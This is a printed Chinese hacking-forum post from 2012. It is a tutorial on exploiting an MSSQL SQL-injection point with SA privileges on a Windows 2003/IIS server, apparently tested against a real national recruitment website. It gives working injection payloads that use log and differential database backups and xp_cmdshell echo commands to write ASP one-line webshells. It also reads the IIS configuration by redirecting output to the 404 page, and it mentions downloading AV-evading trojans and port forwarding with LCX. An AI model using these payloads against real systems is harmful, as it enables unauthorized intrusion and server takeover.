中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————5 v, D( v4 _4 k/ o

* C# N# k# p1 }( n! V7 ?" G( D. A% d9 D6 w0 a, b: A5 d& l) ]
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
, T3 M# J2 F/ N$ I# M; E
! t1 l1 _- g& {% H4 W9 W5 e                                                                 
& J0 @* p; a. w' [6 k+ K                                                                 
& i" @4 f/ |3 f/ Z/ v" H                                                                  论坛: http://www.90team.net/
& T0 W0 m1 j% C7 r$ _1 g' `, J0 q! B$ N& S. y4 T  A# S* F/ n

& Y0 n% ?& b9 y/ L* t: M$ j" |0 [
友情检测国家人才网
# a1 u& _% o. [; T9 L7 M3 ]8 v( Z0 y3 P. R) `- e% b( h
' f- G6 W+ H' L0 ^# p
内容:MSSQL注入SA权限不显错模式下的入侵/ |8 X( z* Y* K+ x4 c3 R

9 o# ~. `# p6 N+ F
3 R; m6 t: E/ p0 S4 ?3 a/ a+ f2 Z一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
: o1 ~) `! L6 V( F7 l* y! Y1 k6 B! k! @! p2 _8 ]/ W+ M0 h+ s
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。$ _$ h1 L! s" t8 P& u+ e% d

+ S3 J$ D% ~  M0 g) J# W6 d$ g7 A  y4 M
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
9 E) ?# T" P; l4 R7 W) n
, Q" s6 V, a& s思路:
% x: z5 Y5 a: @+ ^- G# E5 S
+ n5 z) ^! Q8 L2 r) x首先:
( `2 I. X' B4 _; f0 `, J4 h
! ^3 K: B/ |; ?7 f( t" B通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。% ~  z+ ?6 x* Y. o
  O, r9 @1 P  J
1.日志备份获得Webshell
3 A& k9 ], v1 D& D7 S- ^/ e; E) ~1 j6 ?3 E6 e7 B
2.数据库差异备份获得Webshell
8 S- W( i% s; @$ K" b  M
( b, z9 y% l& b% z& w/ K4.直接下载免杀远控木马。
5 U' C" t0 ]' b
3 _2 ?4 T+ v$ N  m/ {' O1 l5.直接下载LCX将服务器端口转发出来, g# n  Z: o  M
3 r7 [) @3 S" J0 e9 I
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
, F( T9 k4 Q* b7 P8 t) a. {$ A( m' z5 T
- q  S' s: ?0 m; h

- \" n( \! q" h. d( V7 v: M在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
; v- _& d' r6 A8 H) Z+ D# E: K8 {4 f4 `0 i
我直接演示后面一个方法( G' T3 E& a# I$ ~; R

: |, A$ x5 j/ V7 F+ |4 M: s. w
( n4 u, T  K0 S/ S7 D( {5 y' I7 X4 u分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
$ j& ?  A3 O) J+ V( b
9 M+ U6 H% o, X2 p+ [) |3 Y* k
" A9 v1 w6 R9 @! f+ \7 G
4 s4 E) e* k3 k. O; ^4 c' K# y/ g$ d4 ~' i, F: n% y- m
◆日志备份:$ I% |5 J  T3 l3 k/ X
0 M7 v9 ^. o1 I, N4 }

8 I# T, r' @+ L$ D9 R1. 进行初始备份
3 V9 j7 \" ?0 R: t0 Y5 w- z* a; X; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
' T: y5 z+ {' @% M/ X
, C6 R/ T- U# g. [2. 插入数据
2 p- v0 j, G4 J! y! S3 C: I;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--2 W% C" e3 W, i$ |

% J9 g1 E9 O! d0 U+ Y# o% S) ?8 C0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>4 X9 K9 \; A4 w  \: t: [! P' R* M/ j
  # x# t* |) Y2 T% A4 ^
3. 备份并获得文件,删除临时表
, F# S& X! V, C;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--- e( h! D! h8 B* A

. R8 l' }3 X$ g2 _, `% q- E  M% C1 b5 ^$ P# d0 h
5 `& K% s4 L/ u
◆数据库差异备份
6 d! v4 A8 A2 f1 {- Z6 a
/ U  U$ R( X. \/ ]( r(1. 进行差异备份准备工作3 M7 |& k  U6 o3 F
0 B/ O3 c; J' K9 {9 V3 ?+ q# E4 w
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--! P; @% e' r+ n0 x

( d' `* F+ A  O- f  Z& ]( h上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码6 A9 Q! I; ^+ _' l6 F
7 J" \" k- G' n5 @2 @3 v
, R/ w6 O. f8 X/ {6 ~! m$ ]" s
(2. 将数据写入到数据库2 t( v+ G; t9 K+ ~
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 5 ]2 I* n: y3 |/ M

1 n4 C4 O, Q( A( R' d9 N; o" d% }& n0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
5 h+ k) i3 m6 Y0 c9 R
( q1 a: u* e' R, n0 O3. 备份数据库并清理临时文件% o- K" e- ~' `3 ?: W

5 T: m1 C6 L; s' R3 h8 f" v6 [;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--1 j, S: `3 U8 f9 ^& H
3 ~" C, I6 v5 ]; B+ N/ c! f! f
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 8 r# s3 A8 s, q
. t: g: o  f; g9 T# t9 D+ R

7 p* l9 C8 ^! J$ c9 \& R/ u" M0 c9 V
用^转义字符来写ASP(一句话木马)文件的方法:   
* z. x4 ?0 i5 G0 K# d+ ?/ h# A0 m5 g) g! ~' W$ [2 t2 ]" n- u" B7 r# ?
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--' O; H. w+ N9 q6 u

; g; j/ s  [+ Q6 U  K! B2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 7 I0 J! f# c% F7 K) b

1 K6 S6 l+ p% A, R. Y; M读取IIS配置信息获取web路径
+ y7 Y3 {- ^4 [1 G6 J: r, H) j9 X" r, S" |# t0 r
     
# U. p, j( `3 v     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
9 X7 K, C3 j6 Z) _, @4 {5 G& K$ T9 a9 M$ b$ Q3 J. i9 A3 [3 |
执行命令  g1 c% L' M& i! a0 W
     
- `# N  N2 U# M+ c2 G9 k     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--* ^; h& C1 s3 @4 {

$ F: A+ S- s, \' @' h
$ r% j/ @6 `- h& m  K2 O+ c8 u6 [1 N- W! @7 ]

# Y7 U( y/ z; v1 `0 v, T
1 k! @! P; N3 f2 m% B
/ ~8 o  }3 K$ ?% X8 U* a$ |; Z% P0 s! j* u# N2 @

: M. }; W( `+ b( Y2 V  I7 _; n/ }& [; F, ]
; P: H+ d; X- ~3 m! `
0 }" {" ~# z0 `  I

* W3 E6 c+ x2 a* c0 _2 e. x2 {* y1 I7 x& ~
1 H. z+ L, y# |# Y& g0 O

8 u! @$ d, ?, L- \' P( x8 B8 O1 Y

# y( R) k2 U  x5 N1 v
2 r, d$ L% q  {( k. U* f: U' {( c9 b0 D( k7 v

" t6 _. [7 a) i) l  G" z: \, _4 b& I! ^4 E5 J" E
" r+ B4 J7 Y: b( s& B
1 r5 l  J" f( H- r( C

: N% S5 P9 \. {( V" {) ]$ Z& R$ H. ]( F$ j7 L, Z2 H3 \
! ?' j/ u5 d( a5 H% ~0 i
0 ]! v! L3 l# ?8 G: i

2 U# U% A# K3 s1 f7 P5 k2 k8 [, K
( i4 p* O/ U. K5 N& ], I  ~2 Y! y7 R* }! M1 r

! r- ~$ q5 K& o( |$ k  j  Z  c* E4 h$ n. Z/ g- d
3 v( r6 r, V6 Q/ W! u; x' w2 q
) j) h/ V  _$ i2 A& d; Q' y  n+ u

' @+ X- W9 V! ?" q
. d" @7 m( P3 Y! M: ~6 v( C
5 q' y- `2 z9 ^
( M8 {5 i: ]/ k) I! d* g5 g
9 S! b5 K  M+ o3 U. I  M2 g7 J- H( ^4 e5 g5 z3 z

; O$ `) k5 g( }+ W+ J6 K+ G6 h% e3 T) t
8 u$ h" J+ [& I: n+ w
5 Q- w: K* Q0 `! @; `, T
, @) A( \$ y$ h$ g8 T0 g
# p% _6 u* {/ j  u, |* {

# Y1 ?: j7 u$ y! v# @/ r" G( q2 t9 l, ~2 T




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2